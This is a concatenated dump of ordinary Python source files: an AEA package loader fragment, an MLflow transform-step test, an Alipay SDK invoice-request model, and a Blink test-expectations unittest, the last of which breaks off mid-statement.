def prefix_import_path(self) -> str:
"""Get the prefix import path for this component."""
return self.configuration.prefix_import_path
@property
def component_id(self) -> ComponentId:
"""Ge the package id."""
return self.configuration.component_id
@property
def public_id(self) -> PublicId:
"""Get the public id."""
return self.configuration.public_id
@property
def configuration(self) -> ComponentConfiguration:
"""Get the component configuration."""
if self._configuration is None: # pragma: nocover
raise ValueError("The component is not associated with a configuration.")
return self._configuration
@property
def directory(self) -> Path:
"""Get the directory. Raise error if it has not been set yet."""
if self._directory is None:
raise ValueError("Directory not set yet.")
return self._directory
@directory.setter
def directory(self, path: Path) -> None:
"""Set the directory. Raise error if already set."""
if self._directory is not None: # pragma: nocover
raise ValueError("Directory already set.")
self._directory = path
@property
def build_directory(self) -> Optional[str]:
"""Get build directory for the component."""
return self.configuration.build_directory
def load_aea_package(configuration: ComponentConfiguration) -> None:
"""
Load the AEA package from configuration.
It adds all the __init__.py modules into `sys.modules`.
:param configuration: the configuration object.
"""
dir_ = configuration.directory
if dir_ is None: # pragma: nocover
raise ValueError("configuration's directory is None.")
author = configuration.author
package_type_plural = configuration.component_type.to_plural()
package_name = configuration.name
perform_load_aea_package(dir_, author, package_type_plural, package_name)
def perform_load_aea_package(
dir_: Path, author: str, package_type_plural: str, package_name: str
) -> None:
"""
Load the AEA package from values provided.
It adds all the __init__.py modules into `sys.modules`.
:param dir_: path of the component.
:param author: str
:param package_type_plural: str
:param package_name: str
"""
if dir_ is None or not dir_.exists(): # pragma: nocover
raise AEAEnforceError(f"configuration directory `{dir_}` does not exists.")
prefix_root = PACKAGES
prefix_author = prefix_root + f".{author}"
prefix_pkg_type = prefix_author + f".{package_type_plural}"
prefix_root_module = types.ModuleType(prefix_root)
prefix_root_module.__path__ = None # type: ignore
sys.modules[prefix_root] = sys.modules.get(prefix_root, prefix_root_module)
author_module = types.ModuleType(prefix_author)
author_module.__path__ = None # type: ignore
sys.modules[prefix_author] = sys.modules.get(prefix_author, author_module)
prefix_pkg_type_module = types.ModuleType(prefix_pkg_type)
prefix_pkg_type_module.__path__ = None # type: ignore
sys.modules[prefix_pkg_type] = sys.modules.get(
prefix_pkg_type, prefix_pkg_type_module
)
prefix_pkg = prefix_pkg_type + f".{package_name}"
for subpackage_init_file in dir_.rglob("__init__.py"):
parent_dir = subpackage_init_file.parent
relative_parent_dir = parent_dir.relative_to(dir_)
if relative_parent_dir == Path("."):
# this handles the case when 'subpackage_init_file'
# is path/to/package/__init__.py
import_path = prefix_pkg
else: # pragma: nocover
import_path = prefix_pkg + "." + ".".join(relative_parent_dir.parts)
spec = importlib.util.spec_from_file_location(import_path, subpackage_init_file)
if spec is None:
raise RuntimeError(f"Error load module from {subpackage_init_file}")
module = importlib.util.module_from_spec(spec)
sys.modules[import_path] = module
_default_logger.debug(f"loading {import_path}: {module}")
spec.loader.exec_module(module) # type: ignore
|
6c0442cb5025a964dc972305f4d1eef265b28029
|
7b7c570b30d6d7a0e9b904c7cb378cfb0d0f0e07
|
/tests/recipes/test_transform_step.py
|
384842968f7a4c7758ee3142ad24b2514fcc8d3a
|
[
"Apache-2.0"
] |
permissive
|
mlflow/mlflow
|
ca97bfbbf32f8e59f454e428f5e46eb3d34d062f
|
37298ffafcd34002352d01d579d4524790544267
|
refs/heads/master
| 2023-09-01T13:15:53.902815
| 2023-09-01T09:00:42
| 2023-09-01T09:00:42
| 136,202,695
| 14,102
| 3,748
|
Apache-2.0
| 2023-09-14T21:52:42
| 2018-06-05T16:05:58
|
Python
|
UTF-8
|
Python
| false
| false
| 6,246
|
py
|
test_transform_step.py
|
import os
from pathlib import Path
from unittest import mock
from unittest.mock import Mock
import pandas as pd
import pytest
import mlflow
from mlflow import MlflowClient
from mlflow.environment_variables import MLFLOW_RECIPES_EXECUTION_DIRECTORY
from mlflow.exceptions import MlflowException
from mlflow.recipes.steps.transform import TransformStep, _validate_user_code_output
from mlflow.recipes.utils import _RECIPE_CONFIG_FILE_NAME
from mlflow.utils.file_utils import read_yaml
# Sets up the transform step and returns the constructed TransformStep instance and step output dir
def set_up_transform_step(recipe_root: Path, transform_user_module):
split_step_output_dir = recipe_root.joinpath("steps", "split", "outputs")
split_step_output_dir.mkdir(parents=True)
transform_step_output_dir = recipe_root.joinpath("steps", "transform", "outputs")
transform_step_output_dir.mkdir(parents=True)
# use for train and validation, also for split
dataset = pd.DataFrame(
{
"a": list(range(0, 5)),
"b": list(range(5, 10)),
"y": [float(i % 2) for i in range(5)],
}
)
dataset.to_parquet(str(split_step_output_dir / "validation.parquet"))
dataset.to_parquet(str(split_step_output_dir / "train.parquet"))
recipe_yaml = recipe_root.joinpath(_RECIPE_CONFIG_FILE_NAME)
experiment_name = "demo"
MlflowClient().create_experiment(experiment_name)
recipe_yaml.write_text(
f"""
recipe: "regression/v1"
target_col: "y"
experiment:
name: {experiment_name}
tracking_uri: {mlflow.get_tracking_uri()}
steps:
transform:
using: custom
transformer_method: {transform_user_module}
"""
)
recipe_config = read_yaml(recipe_root, _RECIPE_CONFIG_FILE_NAME)
transform_step = TransformStep.from_recipe_config(recipe_config, str(recipe_root))
return transform_step, transform_step_output_dir, split_step_output_dir
def test_transform_step_writes_onehot_encoded_dataframe_and_transformer_pkl(
tmp_recipe_root_path, monkeypatch
):
from sklearn.preprocessing import StandardScaler
m = Mock()
m.transformer_fn = lambda: StandardScaler() # pylint: disable=unnecessary-lambda
monkeypatch.setenv(MLFLOW_RECIPES_EXECUTION_DIRECTORY.name, str(tmp_recipe_root_path))
with mock.patch.dict("sys.modules", {"steps.transform": m}):
transform_step, transform_step_output_dir, _ = set_up_transform_step(
tmp_recipe_root_path, "transformer_fn"
)
transform_step.run(str(transform_step_output_dir))
assert os.path.exists(transform_step_output_dir / "transformed_training_data.parquet")
transformed = pd.read_parquet(transform_step_output_dir / "transformed_training_data.parquet")
assert len(transformed.columns) == 3
assert os.path.exists(transform_step_output_dir / "transformer.pkl")
@pytest.mark.parametrize("recipe", ["regression/v1", "classification/v1"])
def test_transform_steps_work_without_step_config(tmp_recipe_root_path, recipe):
recipe_yaml = tmp_recipe_root_path.joinpath(_RECIPE_CONFIG_FILE_NAME)
experiment_name = "demo"
MlflowClient().create_experiment(experiment_name)
recipe_yaml.write_text(
"""
recipe: {recipe}
target_col: "y"
{positive_class}
experiment:
name: {experiment_name}
tracking_uri: {tracking_uri}
steps:
fakestep:
something: else
""".format(
tracking_uri=mlflow.get_tracking_uri(),
experiment_name=experiment_name,
recipe=recipe,
positive_class='positive_class: "a"' if recipe == "regression/v1" else "",
)
)
recipe_config = read_yaml(tmp_recipe_root_path, _RECIPE_CONFIG_FILE_NAME)
transform_step = TransformStep.from_recipe_config(recipe_config, str(tmp_recipe_root_path))
transform_step._validate_and_apply_step_config()
def test_transform_empty_step(tmp_recipe_root_path, monkeypatch):
monkeypatch.setenv(MLFLOW_RECIPES_EXECUTION_DIRECTORY.name, str(tmp_recipe_root_path))
with mock.patch("steps.transform.transformer_fn", return_value=None):
transform_step, transform_step_output_dir, split_step_output_dir = set_up_transform_step(
tmp_recipe_root_path, "transformer_fn"
)
transform_step.run(str(transform_step_output_dir))
assert os.path.exists(transform_step_output_dir / "transformed_training_data.parquet")
train_transformed = pd.read_parquet(
transform_step_output_dir / "transformed_training_data.parquet"
)
train_split = pd.read_parquet(split_step_output_dir / "train.parquet")
assert train_transformed.equals(train_split) is True
assert os.path.exists(transform_step_output_dir / "transformer.pkl")
def test_validate_method_validates_the_transformer():
class Transformer:
def fit(self):
return "fit"
def transform(self):
return "transform"
transformer = Transformer()
def correct_transformer():
return transformer
validated_transformer = _validate_user_code_output(correct_transformer)
assert transformer == validated_transformer
class InCorrectFitTransformer:
def pick(self):
return "pick"
def transform(self):
return "transform"
in_correct_fit_transformer = InCorrectFitTransformer()
def incorrect__fit_transformer():
return in_correct_fit_transformer
with pytest.raises(
MlflowException,
match="The transformer provided doesn't have a fit method.",
):
validated_transformer = _validate_user_code_output(incorrect__fit_transformer)
class InCorrectTransformer:
def pick(self):
return "pick"
def fit(self):
return "fit"
inCorrectTransformer = InCorrectTransformer()
def incorrect_transformer():
return inCorrectTransformer
with pytest.raises(
MlflowException,
match="The transformer provided doesn't have a transform method.",
):
validated_transformer = _validate_user_code_output(incorrect_transformer)
|
0123f2f49e5fe69dea257ced5a82d660685f8efc
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/MybankCreditLoantradeGuarletterInvoiceApplyModel.py
|
ba414520c919e6e07bb661f17baa56f6164a460d
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 6,934
|
py
|
MybankCreditLoantradeGuarletterInvoiceApplyModel.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.CreditPayMoneyVO import CreditPayMoneyVO
class MybankCreditLoantradeGuarletterInvoiceApplyModel(object):
def __init__(self):
self._address = None
self._apply_user_cert_no = None
self._apply_user_name = None
self._bank_card_no = None
self._bank_name = None
self._contact_mobile = None
self._guar_order_no = None
self._invoice_amt = None
self._invoice_type = None
self._phone = None
self._receive_email = None
self._request_id = None
@property
def address(self):
return self._address
@address.setter
def address(self, value):
self._address = value
@property
def apply_user_cert_no(self):
return self._apply_user_cert_no
@apply_user_cert_no.setter
def apply_user_cert_no(self, value):
self._apply_user_cert_no = value
@property
def apply_user_name(self):
return self._apply_user_name
@apply_user_name.setter
def apply_user_name(self, value):
self._apply_user_name = value
@property
def bank_card_no(self):
return self._bank_card_no
@bank_card_no.setter
def bank_card_no(self, value):
self._bank_card_no = value
@property
def bank_name(self):
return self._bank_name
@bank_name.setter
def bank_name(self, value):
self._bank_name = value
@property
def contact_mobile(self):
return self._contact_mobile
@contact_mobile.setter
def contact_mobile(self, value):
self._contact_mobile = value
@property
def guar_order_no(self):
return self._guar_order_no
@guar_order_no.setter
def guar_order_no(self, value):
self._guar_order_no = value
@property
def invoice_amt(self):
return self._invoice_amt
@invoice_amt.setter
def invoice_amt(self, value):
if isinstance(value, CreditPayMoneyVO):
self._invoice_amt = value
else:
self._invoice_amt = CreditPayMoneyVO.from_alipay_dict(value)
@property
def invoice_type(self):
return self._invoice_type
@invoice_type.setter
def invoice_type(self, value):
self._invoice_type = value
@property
def phone(self):
return self._phone
@phone.setter
def phone(self, value):
self._phone = value
@property
def receive_email(self):
return self._receive_email
@receive_email.setter
def receive_email(self, value):
self._receive_email = value
@property
def request_id(self):
return self._request_id
@request_id.setter
def request_id(self, value):
self._request_id = value
def to_alipay_dict(self):
params = dict()
if self.address:
if hasattr(self.address, 'to_alipay_dict'):
params['address'] = self.address.to_alipay_dict()
else:
params['address'] = self.address
if self.apply_user_cert_no:
if hasattr(self.apply_user_cert_no, 'to_alipay_dict'):
params['apply_user_cert_no'] = self.apply_user_cert_no.to_alipay_dict()
else:
params['apply_user_cert_no'] = self.apply_user_cert_no
if self.apply_user_name:
if hasattr(self.apply_user_name, 'to_alipay_dict'):
params['apply_user_name'] = self.apply_user_name.to_alipay_dict()
else:
params['apply_user_name'] = self.apply_user_name
if self.bank_card_no:
if hasattr(self.bank_card_no, 'to_alipay_dict'):
params['bank_card_no'] = self.bank_card_no.to_alipay_dict()
else:
params['bank_card_no'] = self.bank_card_no
if self.bank_name:
if hasattr(self.bank_name, 'to_alipay_dict'):
params['bank_name'] = self.bank_name.to_alipay_dict()
else:
params['bank_name'] = self.bank_name
if self.contact_mobile:
if hasattr(self.contact_mobile, 'to_alipay_dict'):
params['contact_mobile'] = self.contact_mobile.to_alipay_dict()
else:
params['contact_mobile'] = self.contact_mobile
if self.guar_order_no:
if hasattr(self.guar_order_no, 'to_alipay_dict'):
params['guar_order_no'] = self.guar_order_no.to_alipay_dict()
else:
params['guar_order_no'] = self.guar_order_no
if self.invoice_amt:
if hasattr(self.invoice_amt, 'to_alipay_dict'):
params['invoice_amt'] = self.invoice_amt.to_alipay_dict()
else:
params['invoice_amt'] = self.invoice_amt
if self.invoice_type:
if hasattr(self.invoice_type, 'to_alipay_dict'):
params['invoice_type'] = self.invoice_type.to_alipay_dict()
else:
params['invoice_type'] = self.invoice_type
if self.phone:
if hasattr(self.phone, 'to_alipay_dict'):
params['phone'] = self.phone.to_alipay_dict()
else:
params['phone'] = self.phone
if self.receive_email:
if hasattr(self.receive_email, 'to_alipay_dict'):
params['receive_email'] = self.receive_email.to_alipay_dict()
else:
params['receive_email'] = self.receive_email
if self.request_id:
if hasattr(self.request_id, 'to_alipay_dict'):
params['request_id'] = self.request_id.to_alipay_dict()
else:
params['request_id'] = self.request_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = MybankCreditLoantradeGuarletterInvoiceApplyModel()
if 'address' in d:
o.address = d['address']
if 'apply_user_cert_no' in d:
o.apply_user_cert_no = d['apply_user_cert_no']
if 'apply_user_name' in d:
o.apply_user_name = d['apply_user_name']
if 'bank_card_no' in d:
o.bank_card_no = d['bank_card_no']
if 'bank_name' in d:
o.bank_name = d['bank_name']
if 'contact_mobile' in d:
o.contact_mobile = d['contact_mobile']
if 'guar_order_no' in d:
o.guar_order_no = d['guar_order_no']
if 'invoice_amt' in d:
o.invoice_amt = d['invoice_amt']
if 'invoice_type' in d:
o.invoice_type = d['invoice_type']
if 'phone' in d:
o.phone = d['phone']
if 'receive_email' in d:
o.receive_email = d['receive_email']
if 'request_id' in d:
o.request_id = d['request_id']
return o
|
ddc342bad72d0823dc66b7a1ab0400e992416eb5
|
da1500e0d3040497614d5327d2461a22e934b4d8
|
/third_party/blink/Tools/Scripts/webkitpy/layout_tests/models/test_expectations_unittest.py
|
c8aea18fafd11afcd2a3e16abfb653efa03f755e
|
[
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"BSD-3-Clause",
"Apache-2.0",
"MIT"
] |
permissive
|
youtube/cobalt
|
34085fc93972ebe05b988b15410e99845efd1968
|
acefdaaadd3ef46f10f63d1acae2259e4024d383
|
refs/heads/main
| 2023-09-01T13:09:47.225174
| 2023-09-01T08:54:54
| 2023-09-01T08:54:54
| 50,049,789
| 169
| 80
|
BSD-3-Clause
| 2023-09-14T21:50:50
| 2016-01-20T18:11:34
| null |
UTF-8
|
Python
| false
| false
| 55,779
|
py
|
test_expectations_unittest.py
|
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from collections import OrderedDict
import unittest
from webkitpy.common.host_mock import MockHost
from webkitpy.common.system.output_capture import OutputCapture
from webkitpy.layout_tests.models.test_configuration import TestConfiguration, TestConfigurationConverter
from webkitpy.layout_tests.models.test_expectations import (
TestExpectationLine, TestExpectations, ParseError, TestExpectationParser,
PASS, FAIL, TEXT, IMAGE, IMAGE_PLUS_TEXT, AUDIO,
TIMEOUT, CRASH, LEAK, SKIP, WONTFIX, NEEDS_REBASELINE, MISSING
)
class Base(unittest.TestCase):
# Note that all of these tests are written assuming the configuration
# being tested is Windows 7, Release build.
def __init__(self, testFunc):
host = MockHost()
self._port = host.port_factory.get('test-win-win7', None)
self._exp = None
unittest.TestCase.__init__(self, testFunc)
def get_basic_tests(self):
return ['failures/expected/text.html',
'failures/expected/image_checksum.html',
'failures/expected/crash.html',
'failures/expected/needsrebaseline.html',
'failures/expected/needsmanualrebaseline.html',
'failures/expected/image.html',
'failures/expected/timeout.html',
'passes/text.html',
'reftests/failures/expected/needsrebaseline.html',
'reftests/failures/expected/needsrebaseline_with_txt.html',
'reftests/failures/expected/needsmanualrebaseline.html',
'reftests/failures/expected/needsmanualrebaseline_with_txt.html',
'reftests/failures/expected/has_unused_expectation.html']
def get_basic_expectations(self):
return """
Bug(test) failures/expected/text.html [ Failure ]
Bug(test) failures/expected/crash.html [ Crash ]
Bug(test) failures/expected/needsrebaseline.html [ NeedsRebaseline ]
Bug(test) failures/expected/needsmanualrebaseline.html [ NeedsManualRebaseline ]
Bug(test) failures/expected/image_checksum.html [ Crash ]
Bug(test) failures/expected/image.html [ Crash Mac ]
"""
def parse_exp(self, expectations, overrides=None, is_lint_mode=False):
expectations_dict = OrderedDict()
expectations_dict['expectations'] = expectations
if overrides:
expectations_dict['overrides'] = overrides
self._port.expectations_dict = lambda: expectations_dict
expectations_to_lint = expectations_dict if is_lint_mode else None
self._exp = TestExpectations(self._port, self.get_basic_tests(
), expectations_dict=expectations_to_lint, is_lint_mode=is_lint_mode)
def assert_exp_list(self, test, results):
self.assertEqual(self._exp.get_expectations(test), set(results))
def assert_exp(self, test, result):
self.assert_exp_list(test, [result])
def assert_bad_expectations(self, expectations, overrides=None):
self.assertRaises(ParseError, self.parse_exp, expectations, is_lint_mode=True, overrides=overrides)
class BasicTests(Base):
def test_basic(self):
self.parse_exp(self.get_basic_expectations())
self.assert_exp('failures/expected/text.html', FAIL)
self.assert_exp_list('failures/expected/image_checksum.html', [CRASH])
self.assert_exp('passes/text.html', PASS)
self.assert_exp('failures/expected/image.html', PASS)
class MiscTests(Base):
def test_parse_mac_legacy_names(self):
host = MockHost()
expectations_dict = OrderedDict()
expectations_dict['expectations'] = '\nBug(x) [ Mac10.10 ] failures/expected/text.html [ Failure ]\n'
port = host.port_factory.get('test-mac-mac10.10', None)
port.expectations_dict = lambda: expectations_dict
expectations = TestExpectations(port, self.get_basic_tests())
self.assertEqual(expectations.get_expectations('failures/expected/text.html'), set([FAIL]))
port = host.port_factory.get('test-win-win7', None)
port.expectations_dict = lambda: expectations_dict
expectations = TestExpectations(port, self.get_basic_tests())
self.assertEqual(expectations.get_expectations('failures/expected/text.html'), set([PASS]))
def test_multiple_results(self):
self.parse_exp('Bug(x) failures/expected/text.html [ Crash Failure ]')
self.assertEqual(self._exp.get_expectations('failures/expected/text.html'), set([FAIL, CRASH]))
def test_result_was_expected(self):
# test basics
self.assertEqual(TestExpectations.result_was_expected(PASS, set([PASS]), test_needs_rebaselining=False), True)
self.assertEqual(TestExpectations.result_was_expected(FAIL, set([PASS]), test_needs_rebaselining=False), False)
# test handling of SKIPped tests and results
self.assertEqual(TestExpectations.result_was_expected(SKIP, set([CRASH]), test_needs_rebaselining=False), True)
self.assertEqual(TestExpectations.result_was_expected(SKIP, set([LEAK]), test_needs_rebaselining=False), True)
# test handling of MISSING results and the REBASELINE specifier
self.assertEqual(TestExpectations.result_was_expected(MISSING, set([PASS]), test_needs_rebaselining=True), True)
self.assertEqual(TestExpectations.result_was_expected(MISSING, set([PASS]), test_needs_rebaselining=False), False)
self.assertTrue(TestExpectations.result_was_expected(PASS, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertTrue(TestExpectations.result_was_expected(MISSING, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertTrue(TestExpectations.result_was_expected(TEXT, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertTrue(TestExpectations.result_was_expected(IMAGE, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertTrue(TestExpectations.result_was_expected(IMAGE_PLUS_TEXT,
set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertTrue(TestExpectations.result_was_expected(AUDIO, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertFalse(TestExpectations.result_was_expected(TIMEOUT, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertFalse(TestExpectations.result_was_expected(CRASH, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertFalse(TestExpectations.result_was_expected(LEAK, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
def test_remove_pixel_failures(self):
self.assertEqual(TestExpectations.remove_pixel_failures(set([FAIL])), set([FAIL]))
self.assertEqual(TestExpectations.remove_pixel_failures(set([PASS])), set([PASS]))
self.assertEqual(TestExpectations.remove_pixel_failures(set([IMAGE])), set([PASS]))
self.assertEqual(TestExpectations.remove_pixel_failures(set([FAIL])), set([FAIL]))
self.assertEqual(TestExpectations.remove_pixel_failures(set([PASS, IMAGE, CRASH])), set([PASS, CRASH]))
def test_suffixes_for_expectations(self):
self.assertEqual(TestExpectations.suffixes_for_expectations(set([FAIL])), set(['txt', 'png', 'wav']))
self.assertEqual(TestExpectations.suffixes_for_expectations(set([IMAGE])), set(['png']))
self.assertEqual(TestExpectations.suffixes_for_expectations(set([FAIL, IMAGE, CRASH])), set(['txt', 'png', 'wav']))
self.assertEqual(TestExpectations.suffixes_for_expectations(set()), set())
def test_category_expectations(self):
# This test checks unknown tests are not present in the
# expectations and that known test part of a test category is
# present in the expectations.
exp_str = 'Bug(x) failures/expected [ CRASH ]'
self.parse_exp(exp_str)
test_name = 'failures/expected/unknown-test.html'
unknown_test = test_name
self.assertRaises(KeyError, self._exp.get_expectations,
unknown_test)
self.assert_exp_list('failures/expected/crash.html', [PASS])
def test_get_expectations_string(self):
self.parse_exp(self.get_basic_expectations())
self.assertEqual(self._exp.get_expectations_string('failures/expected/text.html'), 'FAIL')
def test_expectation_to_string(self):
# Normal cases are handled by other tests.
self.parse_exp(self.get_basic_expectations())
self.assertRaises(ValueError, self._exp.expectation_to_string,
-1)
def test_get_test_set(self):
# Handle some corner cases for this routine not covered by other tests.
self.parse_exp(self.get_basic_expectations())
test_set = self._exp.get_test_set(CRASH)
self.assertEqual(test_set, set(['failures/expected/crash.html', 'failures/expected/image_checksum.html']))
def test_needs_rebaseline_reftest(self):
try:
filesystem = self._port.host.filesystem
filesystem.write_text_file(
filesystem.join(
self._port.layout_tests_dir(),
'reftests/failures/expected/needsrebaseline.html'),
'content')
filesystem.write_text_file(
filesystem.join(
self._port.layout_tests_dir(),
'reftests/failures/expected/needsrebaseline-expected.html'),
'content')
filesystem.write_text_file(
filesystem.join(
self._port.layout_tests_dir(),
'reftests/failures/expected/needsrebaseline_with_txt.html'),
'content')
filesystem.write_text_file(
filesystem.join(
self._port.layout_tests_dir(),
'reftests/failures/expected/needsrebaseline_with_txt-expected.html'),
'content')
filesystem.write_text_file(
filesystem.join(
self._port.layout_tests_dir(),
'reftests/failures/expected/needsrebaseline_with_txt-expected.txt'),
'content')
filesystem.write_text_file(
filesystem.join(
self._port.layout_tests_dir(),
'reftests/failures/expected/needsmanualrebaseline.html'),
'content')
filesystem.write_text_file(
filesystem.join(
self._port.layout_tests_dir(),
'reftests/failures/expected/needsmanualrebaseline-expected.html'),
'content')
filesystem.write_text_file(
filesystem.join(
self._port.layout_tests_dir(),
'reftests/failures/expected/needsmanualrebaseline_with_txt.html'),
'content')
filesystem.write_text_file(
filesystem.join(
self._port.layout_tests_dir(),
'reftests/failures/expected/needsmanualrebaseline_with_txt.html'),
'content')
filesystem.write_text_file(
filesystem.join(
self._port.layout_tests_dir(),
'reftests/failures/expected/needsmanualrebaseline_with_txt-expected.html'),
'content')
filesystem.write_text_file(
filesystem.join(
self._port.layout_tests_dir(),
'reftests/failures/expected/needsmanualrebaseline_with_txt-expected.txt'),
'content')
self.parse_exp("""Bug(user) reftests/failures/expected/needsrebaseline.html [ NeedsRebaseline ]
Bug(user) reftests/failures/expected/needsrebaseline_with_txt.html [ NeedsRebaseline ]
Bug(user) reftests/failures/expected/needsmanualrebaseline.html [ NeedsManualRebaseline ]
Bug(user) reftests/failures/expected/needsmanualrebaseline_with_txt.html [ NeedsManualRebaseline ]
""", is_lint_mode=True)
self.assertFalse(True, "ParseError wasn't raised")
except ParseError as error:
warnings = ('expectations:1 A reftest without text expectation cannot be marked as '
'NeedsRebaseline/NeedsManualRebaseline reftests/failures/expected/needsrebaseline.html\n'
'expectations:3 A reftest without text expectation cannot be marked as '
'NeedsRebaseline/NeedsManualRebaseline reftests/failures/expected/needsmanualrebaseline.html')
self.assertEqual(str(error), warnings)
def test_parse_warning(self):
try:
filesystem = self._port.host.filesystem
filesystem.write_text_file(filesystem.join(self._port.layout_tests_dir(), 'disabled-test.html-disabled'), 'content')
filesystem.write_text_file(filesystem.join(self._port.layout_tests_dir(), 'test-to-rebaseline.html'), 'content')
self.parse_exp('Bug(user) [ FOO ] failures/expected/text.html [ Failure ]\n'
'Bug(user) non-existent-test.html [ Failure ]\n'
'Bug(user) disabled-test.html-disabled [ Failure ]\n'
'Bug(user) [ Release ] test-to-rebaseline.html [ NeedsRebaseline ]', is_lint_mode=True)
self.assertFalse(True, "ParseError wasn't raised")
except ParseError as error:
warnings = ('expectations:1 Unrecognized specifier "FOO" failures/expected/text.html\n'
'expectations:2 Path does not exist. non-existent-test.html\n'
'expectations:4 A test cannot be rebaselined for Debug/Release. test-to-rebaseline.html')
self.assertEqual(str(error), warnings)
def test_parse_warnings_are_logged_if_not_in_lint_mode(self):
oc = OutputCapture()
try:
oc.capture_output()
self.parse_exp('-- this should be a syntax error', is_lint_mode=False)
finally:
_, _, logs = oc.restore_output()
self.assertNotEquals(logs, '')
def test_error_on_different_platform(self):
# parse_exp uses a Windows port. Assert errors on Mac show up in lint mode.
self.assertRaises(
ParseError,
self.parse_exp,
('Bug(test) [ Mac ] failures/expected/text.html [ Failure ]\n'
'Bug(test) [ Mac ] failures/expected/text.html [ Failure ]'),
is_lint_mode=True)
def test_error_on_different_build_type(self):
# parse_exp uses a Release port. Assert errors on DEBUG show up in lint mode.
self.assertRaises(
ParseError,
self.parse_exp,
('Bug(test) [ Debug ] failures/expected/text.html [ Failure ]\n'
'Bug(test) [ Debug ] failures/expected/text.html [ Failure ]'),
is_lint_mode=True)
def test_overrides(self):
self.parse_exp('Bug(exp) failures/expected/text.html [ Failure ]',
'Bug(override) failures/expected/text.html [ Timeout ]')
self.assert_exp_list('failures/expected/text.html', [FAIL, TIMEOUT])
def test_overrides__directory(self):
self.parse_exp('Bug(exp) failures/expected/text.html [ Failure ]',
'Bug(override) failures/expected [ Crash ]')
self.assert_exp_list('failures/expected/text.html', [FAIL, CRASH])
self.assert_exp_list('failures/expected/image.html', [CRASH])
def test_overrides__duplicate(self):
self.assert_bad_expectations('Bug(exp) failures/expected/text.html [ Failure ]',
'Bug(override) failures/expected/text.html [ Timeout ]\n'
'Bug(override) failures/expected/text.html [ Crash ]\n')
def test_pixel_tests_flag(self):
def match(test, result, pixel_tests_enabled):
return self._exp.matches_an_expected_result(
test, result, pixel_tests_enabled, sanitizer_is_enabled=False)
self.parse_exp(self.get_basic_expectations())
self.assertTrue(match('failures/expected/text.html', FAIL, True))
self.assertTrue(match('failures/expected/text.html', FAIL, False))
self.assertFalse(match('failures/expected/text.html', CRASH, True))
self.assertFalse(match('failures/expected/text.html', CRASH, False))
self.assertFalse(match('failures/expected/image_checksum.html', PASS, True))
self.assertFalse(match('failures/expected/image_checksum.html', PASS, False))
self.assertFalse(match('failures/expected/crash.html', PASS, False))
self.assertTrue(match('failures/expected/needsrebaseline.html', TEXT, True))
self.assertFalse(match('failures/expected/needsrebaseline.html', CRASH, True))
self.assertTrue(match('failures/expected/needsmanualrebaseline.html', TEXT, True))
self.assertFalse(match('failures/expected/needsmanualrebaseline.html', CRASH, True))
self.assertTrue(match('passes/text.html', PASS, False))
def test_sanitizer_flag(self):
def match(test, result):
return self._exp.matches_an_expected_result(
test, result, pixel_tests_are_enabled=False, sanitizer_is_enabled=True)
self.parse_exp("""
Bug(test) failures/expected/crash.html [ Crash ]
Bug(test) failures/expected/image.html [ Failure ]
Bug(test) failures/expected/text.html [ Failure ]
Bug(test) failures/expected/timeout.html [ Timeout ]
""")
self.assertTrue(match('failures/expected/crash.html', CRASH))
self.assertTrue(match('failures/expected/image.html', PASS))
self.assertTrue(match('failures/expected/text.html', PASS))
self.assertTrue(match('failures/expected/timeout.html', TIMEOUT))
def test_more_specific_override_resets_skip(self):
self.parse_exp('Bug(x) failures/expected [ Skip ]\n'
'Bug(x) failures/expected/text.html [ Failure ]\n')
self.assert_exp('failures/expected/text.html', FAIL)
self.assertNotIn(
